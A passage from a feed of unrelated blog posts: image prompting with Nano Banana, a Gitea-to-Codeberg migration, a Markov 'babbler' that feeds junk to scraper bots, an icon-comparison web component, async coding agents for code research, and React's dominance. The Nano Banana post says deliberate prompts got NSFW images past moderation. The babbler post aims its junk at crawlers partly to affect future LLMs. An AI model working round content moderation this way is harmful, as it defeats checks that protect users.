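        "hands": {"fingernail_length": "short"},
        "outfit": ["dented breastplate", "green apron"],
    }
    print(build_character_prompt(example, "a photo"))
```

Because the description stays a plain dictionary until the last step, individual fields can be edited or regenerated without touching the rest of the prompt.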
One curious behavior I found is that any approach of generating an image of a high fantasy character in this manner has a very high probability of resulting in a digital illustration, even after changing the target publication and adding “do not generate a digital illustration” to the prompt. The solution requires a more clever approach to prompt engineering: add phrases and compositional constraints that imply a heavy physicality to the image, such that a digital illustration would have more difficulty satisfying all of the specified conditions than a photorealistic generation: The image style is definitely closer to Vanity Fair (the photographer is reflected in his breastplate!), and most of the attributes in the previous illustration also apply—the hands/cutlass issue is also fixed. Several elements such as the shoulderplates are different, but not in a manner that contradicts the JSON field descriptions: perhaps that’s a sign that these JSON fields can be prompt engineered to be even more nuanced. Yes, prompting image generation models with HTML and JSON is silly, but “it’s not silly if it works” describes most of modern AI engineering. Nano Banana allows for very strong generation control, but there are several issues. Let’s go back to the original example that made ChatGPT’s image generation go viral: . I ran that exact prompt through Nano Banana on a mirror selfie of myself: …I’m not giving Nano Banana a pass this time. Surprisingly, Nano Banana is terrible at style transfer even with prompt engineering shenanigans, which is not the case with any other modern image editing model. I suspect that the autoregressive properties that allow Nano Banana’s excellent text editing make it too resistant to changing styles. That said, creating a new image does in fact work as expected, and creating a new image using the character provided in the input image with the specified style (as opposed to a style transfer ) has occasional success. 
Speaking of that, Nano Banana has essentially no restrictions on intellectual property, as the examples throughout this blog post have made evident. Not only does it not refuse to generate images of popular IP as ChatGPT now does, but you can also have many different IPs in a single image. Normally, Optimus Prime is the designated driver. I am not a lawyer so I cannot litigate the legalities of training/generating IP in this manner or whether intentionally specifying an IP in a prompt but also stating “do not include any watermarks” is a legal issue: my only goal is to demonstrate what is currently possible with Nano Banana. I suspect that if precedent is set from existing IP lawsuits against OpenAI and Midjourney, Google will be in line to be sued. Another note is moderation of generated images, particularly around NSFW content, which is always important to check if your application uses untrusted user input. As with most image generation APIs, moderation is done against both the text prompt and the raw generated image. That said, while running my standard test suite for new image generation models, I found that Nano Banana is surprisingly one of the more lenient AI APIs. With some deliberate prompts, I can confirm that it is possible to generate NSFW images through Nano Banana; obviously I cannot provide examples. I’ve spent a very large amount of time overall with Nano Banana and although it has a lot of promise, some may ask why I am writing about how to use it to create highly-specific high-quality images at a time when generative AI has threatened creative jobs. The reason is that information asymmetry between what generative image AI can and can’t do has only grown in recent months: many still think that ChatGPT is the only way to generate images and that all AI-generated images are wavy AI slop with a piss yellow filter. The only way to counter this perception is through evidence and reproducibility.
That is why not only am I releasing Jupyter Notebooks detailing the image generation pipeline for each image in this blog post, but why I also included the prompts in this blog post proper; I apologize that it padded the length of the post to 26 minutes, but it’s important to show that these image generations are as advertised and not the result of AI boosterism. You can copy these prompts and paste them into AI Studio and get similar results, or even hack and iterate on them to find new things. Most of the prompting techniques in this blog post are already well-known by AI engineers far more skilled than myself, and turning a blind eye won’t stop people from using generative image AI in this manner. I didn’t go into this blog post expecting it to be a journey, but sometimes the unexpected journeys are the best journeys. There are many cool tricks with Nano Banana I cut from this blog post due to length, such as providing an image to specify character positions and also investigations of styles such as pixel art that most image generation models struggle with, but Nano Banana now nails. These prompt engineering shenanigans are only the tip of the iceberg. Jupyter Notebooks for the generations used in this post are split between the gemimg repository and a second testing repository . I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎ Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎ Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes. 
Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎
A lanky build, as opposed to the real Sonic’s chubby build.
A white chest, as opposed to the real Sonic’s beige chest.
Blue arms with white hands, as opposed to the real Sonic’s beige arms with white gloves.
Small pasted-on-his-head eyes with no eyebrows, as opposed to the real Sonic’s large recessed eyes and eyebrows.
That is the most cleanly-rendered New York Times logo I’ve ever seen. It’s safe to say that Nano Banana trained on the New York Times in some form.
Nano Banana is still bad at rendering text perfectly/without typos, like most image generation models. However, the expanded text is peculiar: it does follow from the prompt, although “Blue Blur” is a nickname for the normal Sonic the Hedgehog. How does an image generating model generate logical text unprompted anyways?
Ugly Sonic is even more like normal Sonic in this iteration: I suspect the “Blue Blur” may have anchored the autoregressive generation to be more Sonic-like.
The image itself does appear to be more professional, and notably has the distinct composition of a photo from a professional news photographer: adherence to the “rule of thirds”, good use of negative space, and better color balance.
, mostly check. (the hands are transposed and the cutlass disappears)

Brain Baking 3 weeks ago

Migrating From Gitea To Codeberg

After last week’s Gitea attack debacle, moving all things Git off the VPS became a top priority. In 2022, like many of you, I gave up GitHub and spun up two Gitea instances myself: a private one safely behind bars on the NAS and a public one where all my public GitHub projects were moved to. Three years later, I think it’s time to move again. Gitea was forked into Forgejo a few years ago because of yet another licensing drama but I just couldn’t be bothered to keep everything up to date. So I didn’t. And then Gitea started acting annoying: artifact folders weren’t properly cleaned up, even though I encouraged it to do so in the configuration, up to the point that the files clogged up the entire disk. The result was crashes of nearly everything, as there weren’t even a few bytes of space left to append to logs in . And then bots started scraping the hell out of the commit endpoints. Anyway, I liked Gitea/Forgejo’s ease of use, so migrating everything off-site to Codeberg seemed like the most obvious solution. I’ve been wanting to go back to a coding community for a while now. If you host your own Gitea instance, you isolate yourself from the rest of the open source world. Collaboration is still easiest on GitHub, as simply everyone is hanging out there, but I’d rather stop coding entirely than feed Microsoft’s AI. Give Up GitHub, folks. The migration steps were surprisingly easy and fast to execute: Congratulations, you’re now the proud owner of Codeberg repositories. From here, we now have to decide what to do with the old Gitea instance. Do you want to simply kill it? Do you want to mirror your repositories? Or temporarily forward using the same URLs?
Since I don’t want to keep it around forever and wanted to stop it immediately, but not yet break all URLs, I rewrote the Nginx location to a redirect: This does redirect https://codeberg.org/wouterg/brainbaking to the new correct location https://codeberg.org/wouterg/brainbaking, but it does not fix that will not follow redirects by default. You can proxy the entire thing and add more headers to fix that, or tell Git to follow redirects instead, or just change the remote URL and be done with it: . I figured not a lot of folks have cloned copies of my repositories on their hard drives, and if you do, you’d probably go looking online for the correct version and remove/reclone the entire thing. Next, it is time to kill the Gitea instance: (and ). Set a reminder in your calendar to remove the redirect and clean up your VPS in a month or two, just to be sure. I should have enough backups in case things go wrong but you never know. The final piece of the puzzle is a financial one. Codeberg is a non-profit organisation that relies entirely on donations to keep things spinning, and I reckon they also need resources to fight those pesky AI crawlers (they’re also using Anubis, by the way). Consider donating or even becoming an active member, which also allows you to vote when strategic decisions are being made. Go library programmers, don’t forget to double-check your import paths. So-called “vanity imports” ease friction here as you can set up a redirect from there. should still work. I rely on vangen to generate simple HTML pages for import paths. In the future, I’d rather move these paths to to avoid cluttering up Hugo’s folder. By Wouter Groeneveld on 13 November 2025. Create a Codeberg account. Generate a temporary access token on your to-be-defunct Gitea instance: see https://docs.gitea.com/development/api-usage for the exact command.
For each repository to migrate: click on your profile, and instead of creating a new blank repository, select “from migration” or go to URL https://codeberg.org/repo/migrate . Select Gitea, fill in the Git endpoint and access token and press migrate . Optionally, also migrate LFS/Wikis/issues/whatever by checking the appropriate boxes. Re-archive the repositories that were publicly archived.
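The steps above use the web form. If you have many repositories, the same migration can in principle be scripted against the API instead, which is a different route from the one described in the post. The sketch below only builds the request and does not send it. It assumes Codeberg exposes the Gitea-style `POST /api/v1/repos/migrate` endpoint and that the payload field names below match it; both are assumptions based on my reading of the Gitea API and should be checked against the Codeberg/Forgejo API documentation. The host, owner, and token values are placeholders.

```python
import json
import urllib.request


def build_migration_request(codeberg_token: str, gitea_base: str,
                            gitea_token: str, owner: str,
                            repo: str) -> urllib.request.Request:
    """Prepare (but do not send) a repository migration request."""
    payload = {
        "clone_addr": f"{gitea_base.rstrip('/')}/{owner}/{repo}.git",
        "repo_name": repo,
        "service": "gitea",         # source forge type (assumed field/value)
        "auth_token": gitea_token,  # temporary token from the old instance
        "wiki": True,               # optional extras, mirroring the checkboxes
        "issues": True,
        "lfs": True,
    }
    return urllib.request.Request(
        "https://codeberg.org/api/v1/repos/migrate",  # assumed endpoint
        data=json.dumps(payload).encode("utf-8"),
        headers={
            "Content-Type": "application/json",
            "Authorization": f"token {codeberg_token}",
        },
        method="POST",
    )


if __name__ == "__main__":
    req = build_migration_request("CODEBERG_TOKEN", "https://git.example.org",
                                  "GITEA_TOKEN", "alice", "demo")
    print(req.full_url, req.data.decode("utf-8"))
    # To actually run it: urllib.request.urlopen(req)
```

Looping this over a list of repository names would replace the per-repository clicking, at the cost of having to re-archive and double-check the results yourself.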

Herman's blog 3 weeks ago

Messing with bots

As outlined in my previous two posts : scrapers are, inadvertently, DDoSing public websites. I've received a number of emails from people running small web services and blogs seeking advice on how to protect themselves. This post isn't about that. This post is about fighting back. When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server. This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic looking content based on that data. Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, are the bots that scrape with malicious intent. I get hundreds of thousands of requests for things like , , and all the different paths that could potentially signal a misconfigured Wordpress instance. These people are the real baddies. Generally I just block these requests with a response. But since they want files, why don't I give them what they want? I trained my Markov chain on a few hundred files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they're obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters. Here's a sample 1kb output: I had two goals here. The first was to waste as much of the bot's time and resources as possible, so the larger the file I could serve, the better. 
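For readers who haven't met Markov chain babblers before, here is a minimal word-level sketch of the idea. It is written in Python for brevity and is not the Rust babbler described in this post; the function names and the default order of 2 are my own choices.

```python
import random
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

Model = Dict[Tuple[str, ...], List[str]]


def train(text: str, order: int = 2) -> Model:
    """Map each run of `order` words to the words seen right after it.

    The text must contain more than `order` words, or the model is empty.
    """
    words = text.split()
    model = defaultdict(list)
    for i in range(len(words) - order):
        model[tuple(words[i:i + order])].append(words[i + order])
    return dict(model)


def babble(model: Model, length: int = 50, seed: Optional[int] = None) -> str:
    """Generate `length` words by repeatedly sampling a follower word."""
    rng = random.Random(seed)
    states = list(model)
    state = rng.choice(states)
    out = list(state)
    while len(out) < length:
        followers = model.get(state)
        if not followers:
            # Dead end (state only seen at the end of the text): restart.
            state = rng.choice(states)
            out.extend(state)
            continue
        nxt = rng.choice(followers)
        out.append(nxt)
        state = (*state[1:], nxt)
    return " ".join(out[:length])
```

Trained on a pile of real files, the output keeps the local texture of the source (keywords, brackets, variable-like names) without meaning anything, which is why it passes at a glance and fails on inspection.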
The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try to figure out if there was an exploit to be had.
Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads. This led to another idea: What is the most efficient way to serve data? It's as a static site (or something similar).
So down another rabbit hole I went, writing an efficient garbage server. I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display. Each post would then have a link to 5 other "posts" at the bottom that all technically call the same endpoint, so I don't need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes quickly, in this case by a factor of 5. You can see it in action here: https://herm.app/babbler/
This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold: I was working on this on Halloween. I hope it will make future LLMs sound slightly old-school and spoooooky. It's in the public domain, so no copyright issues. I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.
I made sure to add attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I've also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I'm not connecting this to a database, and it works. With this running, I did the same for php files, creating a static server that would serve a different (real) file from memory on request. You can see this running here: https://herm.app/babbler.php (or any path with in it). There's a counter at the bottom of each of these pages as well. As Maury said: "Garbage for the garbage king!"
Now with the fun out of the way, a word of caution. I don't have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using , , and rules, there's still a chance that Googlebot or other search engine scrapers will scrape the wrong endpoint and determine you're spamming. If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else . This doesn't just affect your search ratings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal. However, this applies only to the post babbler. The php babbler is still fair game since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious.
So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s. What I've done as a compromise is added the following hidden link on my blog, and another small project of mine, to tempt the bad scrapers:
The only thing I'm worried about now is running out of Outbound Transfer budget on my VPS. If I get close I'll cache it with Cloudflare, at the expense of the counter.
This was a fun little project, even if there were a few dead ends. I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger. Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun.
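The paragraph-serving idea from this post (hold the book in memory, pick a random starting paragraph, show it with the next 4, and append 5 links that all resolve to the same handler) can be sketched roughly as follows. This is a minimal Python illustration, not the author's server: the function names, the `/babbler/<hex>/` link scheme, and the wrap-around at the end of the text are all assumptions made for the example.

```python
import html
import random

LINKS_PER_PAGE = 5       # the post describes 5 outgoing links per page
PARAGRAPHS_PER_PAGE = 5  # one random paragraph plus the 4 that follow it


def load_paragraphs(text: str) -> list[str]:
    """Split the source text on blank lines and keep the non-empty paragraphs in memory."""
    return [p.strip() for p in text.split("\n\n") if p.strip()]


def render_post(paragraphs: list[str], rng: random.Random) -> str:
    """Build one page: a random run of consecutive paragraphs plus random links."""
    if not paragraphs:
        raise ValueError("need at least one paragraph to serve")
    start = rng.randrange(len(paragraphs))
    # Assumption: wrap around the end of the text so every page has the same length.
    body = [
        paragraphs[(start + offset) % len(paragraphs)]
        for offset in range(PARAGRAPHS_PER_PAGE)
    ]
    # Hypothetical URL scheme: the random slug only makes each link look unique;
    # every one of them would be answered by this same function, so no index is stored.
    links = [f"/babbler/{rng.getrandbits(32):08x}/" for _ in range(LINKS_PER_PAGE)]
    parts = [f"<p>{html.escape(p)}</p>" for p in body]
    parts += [f'<a href="{url}">{url}</a>' for url in links]
    return "\n".join(parts)


if __name__ == "__main__":
    sample = "\n\n".join(f"Paragraph number {i}." for i in range(20))
    print(render_post(load_paragraphs(sample), random.Random()))
```

Because nothing is stored per page, the cost of a request is one random index plus a few string joins, which is why a crawler following every link grows its queue by a factor of 5 per level while the server does constant work.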

Jim Nielsen 1 month ago

Leveraging a Web Component For Comparing iOS and macOS Icons

Whenever Apple does a visual refresh in their OS updates, a new wave of icon archiving starts for me. Now that “Liquid Glass” is out, I’ve begun nabbing the latest icons from Apple and other apps and adding them to my gallery. Since I’ve been collecting these icons for so long, one of the more interesting and emerging attributes of my collection is the visual differences in individual app icons over time. For example: what are the differences between the icons I have in my collection for Duolingo? Well, I have a page for that today. That’ll let you see all the different versions I’ve collected for Duolingo (not exhaustive, I’m sure, but still interesting) as well as their different sizes. But what if you want to analyze their differences pixel-by-pixel? Turns out, There’s A Web Component For That™️.
Image Compare is exactly what I was envisioning: “A tiny, zero-dependency web component for comparing two images using a slider” from the very fine folks at Cloud Four. It’s super easy to use: some HTML and a link to a script (hosted if you like, or you can vendor it), e.g.
And just like that, boom, I’ve got a widget for comparing two icons. For Duolingo specifically, I have a long history of icons archived in my gallery and they’re all available under the route for your viewing and comparison pleasure. Wanna see some more examples besides Duolingo? Check out the ones for GarageBand, Instagram, and Highlights for starters. Or, just look at the list of iOS apps and find the ones that are interesting to you (or if you’re a fan of macOS icons, check these ones out).
I kinda love how easy it was for my thought process to go from idea to reality:
“It would be cool to compare differences in icons by overlaying them…”
“Image diff tools do this, I bet I could find a good one…”
“Hey, Cloud Four makes a web component for this? Surely it’s good…”
“Hey look, it’s just HTML: a tag linking to compiled JS along with a custom element? Easy, no build process required…”
“Done. Well that was easy. I guess the hardest part here will be writing the blog post about it.”
And I’ve written the post, so this chunk of work is now done.

Simon Willison 1 month ago

Code research projects with async coding agents like Claude Code and Codex

I've been experimenting with a pattern for LLM usage recently that's working out really well: asynchronous code research tasks . Pick a research question, spin up an asynchronous coding agent and let it go and run some experiments and report back when it's done. Software development benefits enormously from something I call code research . The great thing about questions about code is that they can often be definitively answered by writing and executing code. I often see questions on forums which hint at a lack of understanding of this skill. "Could Redis work for powering the notifications feed for my app?" is a great example. The answer is always "it depends", but a better answer is that a good programmer already has everything they need to answer that question for themselves. Build a proof-of-concept, simulate the patterns you expect to see in production, then run experiments to see if it's going to work. I've been a keen practitioner of code research for a long time. Many of my most interesting projects started out as a few dozen lines of experimental code to prove to myself that something was possible. It turns out coding agents like Claude Code and Codex are a fantastic fit for this kind of work as well. Give them the right goal and a useful environment and they'll churn through a basic research project without any further supervision. LLMs hallucinate and make mistakes. This is far less important for code research tasks because the code itself doesn't lie: if they write code and execute it and it does the right things then they've demonstrated to both themselves and to you that something really does work. They can't prove something is impossible - just because the coding agent couldn't find a way to do something doesn't mean it can't be done - but they can often demonstrate that something is possible in just a few minutes of crunching. 
I've used interactive coding agents like Claude Code and Codex CLI for a bunch of these, but today I'm increasingly turning to their asynchronous coding agent family members instead. An asynchronous coding agent is a coding agent that operates on a fire-and-forget basis. You pose it a task, it churns away on a server somewhere and when it's done it files a pull request against your chosen GitHub repository. OpenAI's Codex Cloud , Anthropic's Claude Code for web , Google Gemini's Jules , and GitHub's Copilot coding agent are four prominent examples of this pattern. These are fantastic tools for code research projects. Come up with a clear goal, turn it into a few paragraphs of prompt, set them loose and check back ten minutes later to see what they've come up with. I'm firing off 2-3 code research projects a day right now. My own time commitment is minimal and they frequently come back with useful or interesting results. You can run a code research task against an existing GitHub repository, but I find it's much more liberating to have a separate, dedicated repository for your coding agents to run their projects in. This frees you from being limited to research against just code you've already written, and also means you can be much less cautious about what you let the agents do. I have two repositories that I use for this - one public, one private. I use the public one for research tasks that have no need to be private, and the private one for anything that I'm not yet ready to share with the world. The biggest benefit of a dedicated repository is that you don't need to be cautious about what the agents operating in that repository can do. Both Codex Cloud and Claude Code for web default to running agents in a locked-down environment, with strict restrictions on how they can access the network. 
This makes total sense if they are running against sensitive repositories - a prompt injection attack of the lethal trifecta variety could easily be used to steal sensitive code or environment variables. If you're running in a fresh, non-sensitive repository you don't need to worry about this at all! I've configured my research repositories for full network access, which means my coding agents can install any dependencies they need, fetch data from the web and generally do anything I'd be able to do on my own computer. Let's dive into some examples. My public research repository is at simonw/research on GitHub. It currently contains 13 folders, each of which is a separate research project. I only created it two weeks ago so I'm already averaging nearly one a day! It also includes a GitHub Workflow which uses GitHub Models to automatically update the README file with a summary of every new project, using Cog, LLM, llm-github-models and this snippet of Python. Here are some example research projects from the repo. node-pyodide shows an example of a Node.js script that runs the Pyodide WebAssembly distribution of Python inside it - yet another of my ongoing attempts to find a great way of running Python in a WebAssembly sandbox on a server. python-markdown-comparison (transcript) provides a detailed performance benchmark of seven different Python Markdown libraries. I fired this one off because I stumbled across cmarkgfm, a Python binding around GitHub's Markdown implementation in C, and wanted to see how it compared to the other options. This one produced some charts!
came out on top by a significant margin: Here's the entire prompt I used for that project: Create a performance benchmark and feature comparison report on PyPI cmarkgfm compared to other popular Python markdown libraries - check all of them out from github and read the source to get an idea for features, then design and run a benchmark including generating some charts, then create a report in a new python-markdown-comparison folder (do not create a _summary.md file or edit anywhere outside of that folder). Make sure the performance chart images are directly displayed in the README.md in the folder. Note that I didn't specify any Markdown libraries other than - Claude Code ran a search and found the other six by itself. cmarkgfm-in-pyodide is a lot more fun. A neat thing about having all of my research projects in the same repository is that new projects can build on previous ones. Here I decided to see how hard it would be to get - which has a C extension - working inside Pyodide inside Node.js. Claude successfully compiled a 88.4KB file with the necessary C extension and proved it could be loaded into Pyodide in WebAssembly inside of Node.js. I ran this one using Claude Code on my laptop after an initial attempt failed. The starting prompt was: Figure out how to get the cmarkgfm markdown lover [typo in prompt, this should have been "library" but it figured it out anyway] for Python working in pyodide. This will be hard because it uses C so you will need to compile it to pyodide compatible webassembly somehow. Write a report on your results plus code to a new cmarkgfm-in-pyodide directory. Test it using pytest to exercise a node.js test script that calls pyodide as seen in the existing node.js and pyodide directory There is an existing branch that was an initial attempt at this research, but which failed because it did not have Internet access. You do have Internet access. 
Use that existing branch to accelerate your work, but do not commit any code unless you are certain that you have successfully executed tests that prove that the pyodide module you created works correctly. This one gave up half way through, complaining that emscripten would take too long. I told it: Complete this project, actually run emscripten, I do not care how long it takes, update the report if it works It churned away for a bit longer and complained that the existing Python library used CFFI which isn't available in Pyodide. I asked it: Can you figure out how to rewrite cmarkgfm to not use FFI and to use a pyodide-friendly way of integrating that C code instead? ... and it did. You can see the full transcript here . blog-tags-scikit-learn . Taking a short break from WebAssembly, I thought it would be fun to put scikit-learn through its paces on a text classification task against my blog: Work in a new folder called blog-tags-scikit-learn Download - a SQLite database. Take a look at the blog_entry table and the associated tags - a lot of the earlier entries do not have tags associated with them, where the later entries do. Design, implement and execute models to suggests tags for those earlier entries based on textual analysis against later ones Use Python scikit learn and try several different strategies Produce JSON of the results for each one, plus scripts for running them and a detailed markdown description Also include an HTML page with a nice visualization of the results that works by loading those JSON files. This resulted in seven files, four results files and a detailed report . (It ignored the bit about an HTML page with a nice visualization for some reason.) Not bad for a few moments of idle curiosity typed into my phone! That's just three of the thirteen projects in the repository so far. The commit history for each one usually links to the prompt and sometimes the transcript if you want to see how they unfolded. 
More recently I added a short file to the repo with a few extra tips for my research agents. You can read that here . My preferred definition of AI slop is AI-generated content that is published without human review. I've not been reviewing these reports in great detail myself, and I wouldn't usually publish them online without some serious editing and verification. I want to share the pattern I'm using though, so I decided to keep them quarantined in this one public repository. A tiny feature request for GitHub: I'd love to be able to mark a repository as "exclude from search indexes" such that it gets labelled with tags. I still like to keep AI-generated content out of search, to avoid contributing more to the dead internet . It's pretty easy to get started trying out this coding agent research pattern. Create a free GitHub repository (public or private) and let some agents loose on it and see what happens. You can run agents locally but I find the asynchronous agents to be more convenient - especially as I can run them (or trigger them from my phone) without any fear of them damaging my own machine or leaking any of my private data. Claude Code for web offers a free $250 of credits for their $20/month users for a limited time (until November 18, 2025). Gemini Jules has a free tier . There are plenty of other coding agents you can try out as well. Let me know if your research agents come back with anything interesting!
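As a small illustration of the "answer the question by writing and executing code" idea in this post, here is a minimal sketch of a benchmark harness in Python using only the standard library. It is not taken from the simonw/research repository: the `benchmark` and `fastest` helpers and the two toy candidates are hypothetical stand-ins for whatever libraries or approaches a real research task would compare.

```python
import re
import timeit
from typing import Callable


def benchmark(
    candidates: dict[str, Callable[[str], object]],
    payload: str,
    repeats: int = 200,
) -> dict[str, float]:
    """Run every candidate on the same input and return average seconds per call."""
    results: dict[str, float] = {}
    for name, func in candidates.items():
        # timeit calls the function `repeats` times and returns the total elapsed time.
        total = timeit.timeit(lambda: func(payload), number=repeats)
        results[name] = total / repeats
    return results


def fastest(results: dict[str, float]) -> str:
    """Name of the candidate with the lowest average time."""
    return min(results, key=results.get)


if __name__ == "__main__":
    # Hypothetical candidates: two ways of counting words in a document.
    candidates = {
        "str.split": lambda text: len(text.split()),
        "regex": lambda text: len(re.findall(r"\S+", text)),
    }
    document = "the quick brown fox jumps over the lazy dog " * 1000
    timings = benchmark(candidates, document)
    for name, seconds in sorted(timings.items(), key=lambda item: item[1]):
        print(f"{name}: {seconds * 1e6:.1f} microseconds per call")
    print("fastest:", fastest(timings))
```

The point of the sketch is the shape of the experiment rather than the numbers: same input, several candidates, measured rather than guessed. A real research run would swap in the actual libraries and a workload that resembles production.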

Den Odell 1 month ago

Escape Velocity: Break Free from Framework Gravity

Frameworks were supposed to free us from the messy parts of the web. For a while they did, until their gravity started drawing everything else into orbit. Every framework brought with it real progress. React, Vue, Angular, Svelte, and others all gave structure, composability, and predictability to frontend work. But now, after a decade of React dominance, something else has happened. We haven’t just built apps with React, we’ve built an entire ecosystem around it—hiring pipelines, design systems, even companies—all bound to its way of thinking. The problem isn’t React itself, nor any other framework for that matter. The problem is the inertia that sets in once any framework becomes infrastructure. By that point, it’s “too important to fail,” and everything nearby turns out to be just fragile enough to prove it. React is no longer just a library. It’s a full ecosystem that defines how frontend developers are allowed to think. Its success has created its own kind of gravity, and the more we’ve built within it, the harder it’s become to break free. Teams standardize on it because it’s safe: it’s been proven to work at massive scale, the talent pool is large, and the tooling is mature. That’s a rational choice, but it also means React exerts institutional gravity. Moving off it stops being an engineering decision and becomes an organizational risk instead. Solutions to problems tend to be found within its orbit, because stepping outside it feels like drifting into deep space. We saw this cycle with jQuery in the past, and we’re seeing it again now with React. We’ll see it with whatever comes next. Success breeds standardization, standardization breeds inertia, and inertia convinces us that progress can wait. It’s the pattern itself that’s the problem, not any single framework. But right now, React sits at the center of this dynamic, and the stakes are far higher than they ever were with jQuery. 
Entire product lines, architectural decisions, and career paths now depend on React-shaped assumptions. We’ve even started defining developers by their framework: many job listings ask for “React developers” instead of frontend engineers. Even AI coding agents default to React when asked to start a new frontend project, unless deliberately steered elsewhere. Perhaps the only thing harder than building on a framework is admitting you might need to build without one. React’s evolution captures this tension perfectly. Recent milestones include the creation of the React Foundation , the React Compiler reaching v1.0 , and new additions in React 19.2 such as the and Fragment Refs. These updates represent tangible improvements. Especially the compiler, which brings automatic memoization at build time, eliminating the need for manual and optimization. Production deployments show real performance wins using it: apps in the Meta Quest Store saw up to 2.5x faster interactions as a direct result. This kind of automatic optimization is genuinely valuable work that pushes the entire ecosystem forward. But here’s the thing: the web platform has been quietly heading in the same direction for years, building many of the same capabilities frameworks have been racing to add. Browsers now ship View Transitions, Container Queries, and smarter scheduling primitives. The platform keeps evolving at a fair pace, but most teams won’t touch these capabilities until React officially wraps them in a hook or they show up in Next.js docs. Innovation keeps happening right across the ecosystem, but for many it only becomes “real” once React validates the approach. Which is fine, assuming you enjoy waiting for permission to use the platform you’re already building on. The React Foundation represents an important milestone for governance and sustainability. 
This new foundation is a part of the Linux Foundation, and founding members include Meta, Vercel, Microsoft, Amazon, Expo, Callstack, and Software Mansion. This is genuinely good for React’s long-term health, providing better governance and removing the risk of being owned by a single company. It ensures React can outlive any one organization’s priorities. But it doesn’t fundamentally change the development dynamic of the framework. Yet. The engineers who actually build React still work at companies like Meta and Vercel. The research still happens at that scale, driven by those performance needs. The roadmap still reflects the priorities of the companies that fund full-time development. And to be fair, React operates at a scale most frameworks will never encounter. Meta serves billions of users through frontends that run on constrained mobile devices around the world, so it needs performance at a level that justifies dedicated research teams. The innovations they produce, including compiler-driven optimization, concurrent rendering, and increasingly fine-grained performance tooling, solve real problems that exist only at that kind of massive scale. But those priorities aren’t necessarily your priorities, and that’s the tension. React’s innovations are shaped by the problems faced by companies running apps at billions-of-users scale, not necessarily the problems faced by teams building for thousands or millions. React’s internal research reveals the team’s awareness of current architectural limitations. Experimental projects like Forest explore signal-like lazy computation graphs; essentially fine-grained reactivity instead of React’s coarse re-render model. Another project, Fir , investigates incremental rendering techniques. These aren’t roadmap items; they’re just research prototypes happening inside Meta. They may never ship publicly. 
But they do reveal something important: React’s team knows the virtual DOM model has performance ceilings and they’re actively exploring what comes after it. This is good research, but it also illustrates the same dynamic at play again: that these explorations happen behind the walls of Big Tech, on timelines set by corporate priorities and resource availability. Meanwhile, frameworks like Solid and Qwik have been shipping production-ready fine-grained reactivity for years. Svelte 5 shipped runes in 2024, bringing signals to mainstream adoption. The gap isn’t technical capability, but rather when the industry feels permission to adopt it. For many teams, that permission only comes once React validates the approach. This is true regardless of who governs the project or what else exists in the ecosystem. I don’t want this critique to take away from what React has achieved over the past twelve years. React popularized declarative UIs and made component-based architecture mainstream, which was a huge deal in itself. It proved that developer experience matters as much as runtime performance and introduced the idea that UI could be a pure function of input props and state. That shift made complex interfaces far easier to reason about. Later additions like hooks solved the earlier class component mess elegantly, and concurrent rendering through `` opened new possibilities for truly responsive UIs. The React team’s research into compiler optimization, server components, and fine-grained rendering pushes the entire ecosystem forward. This is true even when other frameworks ship similar ideas first. There’s value in seeing how these patterns work at Meta’s scale. The critique isn’t that React is bad, but that treating any single framework as infrastructure creates blind spots in how we think and build. 
